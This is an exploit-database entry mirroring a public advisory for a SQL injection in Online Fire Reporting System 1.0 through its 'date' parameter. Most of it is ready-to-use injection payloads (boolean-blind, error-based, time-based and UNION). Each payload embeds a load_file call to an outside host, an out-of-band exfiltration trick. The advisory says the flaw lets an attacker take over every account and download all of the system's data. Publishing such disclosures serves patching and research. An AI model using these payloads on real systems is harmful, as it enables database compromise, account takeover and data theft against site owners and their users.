Advertisement






Online Fire Reporting System 1.0 SQL Injection

CVE Category Price Severity
CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2022-05-25
CPE
cpe:cpe:/a:online-fire-reporting-system:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050086

Below is a copy:

Online Fire Reporting System 1.0 SQL Injection
## Title: Online Fire Reporting System 1.0 SQLi
## Author: nu11secur1ty
## Date: 05.24.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting



## Description:
The `date` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'
was submitted in the `date` parameter.
The attacker can take administrator accounts control and also of all
accounts on this system, also the malicious user can download all
information about this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: date (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: page=reports&date=2022-05-24'+(select
load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''
OR NOT 3052=3052 AND 'yrRg'='yrRg

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: page=reports&date=2022-05-24'+(select
load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''
AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT
(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=reports&date=2022-05-24'+(select
load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''
AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: page=reports&date=2022-05-24'+(select
load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)

## Proof and Exploit:
[href](https://streamable.com/znojdy)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum